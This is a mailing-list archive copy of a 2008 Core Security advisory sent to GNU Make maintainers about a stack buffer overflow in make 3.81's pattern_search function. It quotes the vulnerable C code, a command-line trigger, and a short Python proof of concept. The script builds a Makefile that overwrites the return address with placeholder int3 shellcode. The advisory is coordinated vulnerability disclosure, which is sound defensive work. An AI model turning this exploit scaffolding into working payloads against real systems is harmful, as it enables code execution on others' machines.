[Top][All Lists]
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
GNU-make filename buffer overflow
From: |
Core Security Advisories Team (CS) |
Subject: |
GNU-make filename buffer overflow |
Date: |
Mon, 30 Jun 2008 18:25:09 -0300 |
Hello,
Alfredo Ortega from Core Security Technologies has found that GNU Make
is vulnerable to a stack buffer overflow.
We would like to receive information about your plans for fixing this
bug. Technical details follow.
Affected software: GNU Make-3.81 and before.
The security impact of this bug is very low, because Makefiles already
contain the functionality to execute arbitrary code.
The bug resides in the following code at implicit.c:
199 static int
200 pattern_search (struct file *file, int archive,
201 unsigned int depth, unsigned int recursions)
202 {
203 /* Filename we are searching for a rule for. */
204 char *filename = archive ? strchr (file->name, '(') : file->name;
...
271 PATH_VAR (stem_str); /* @@ Need to get rid of stem, stemlen,
etc. */
...
470 if (check_lastslash)
471 {
472 stem += lastslash - filename + 1;
473 stemlen -= (lastslash - filename) + 1;
474 }
475
476 DBS (DB_IMPLICIT, (_("Trying pattern rule with stem
`%.*s'.\n"),
477 (int) stemlen, stem));
478
479 strncpy (stem_str, stem, stemlen);
480 stem_str[stemlen] = '\0';
Here, in line 271 the program is allocating a fixed-length variable on
the stack (using the macro PATH_VAR), but in line 479 the filename is
being copied to this buffer without any length-checking.
An easy way to trigger the bug is via command-line arguments.
For example:
$ make AAAAAA... (10000 A's)
Also, the bug can be triggered from inside Makefiles.
The following Proof of Concept triggers a Int3 on a FreeBSD-6.2-RELEASE
system. Other software may be vulnerable.
-------
#Alfredo A. Ortega - Core Security Exploit Writers Team (EWT)
#GNU Make stack overflow
#This Python script generates a Makefile that trigger the overflow
#and executes a int3 instruction (SIGTRAP)
#Tested on FreeBSD-6.2-RELEASE
#usage: python makeexploit.py >Makefile;gmake
import os
#ShellCode placeholder
overflow='\xcc'*1052
#Address
overflow+='\xbf'*4
print "all: %s" % overflow
-------
Thanks in advance,
-Carlos
--
Carlos Sarraute
Advisories Team
Core Security Technologies
www.coresecurity.com
[Prev in Thread] |
Current Thread |
[Next in Thread] |
- GNU-make filename buffer overflow,
Core Security Advisories Team (CS) <=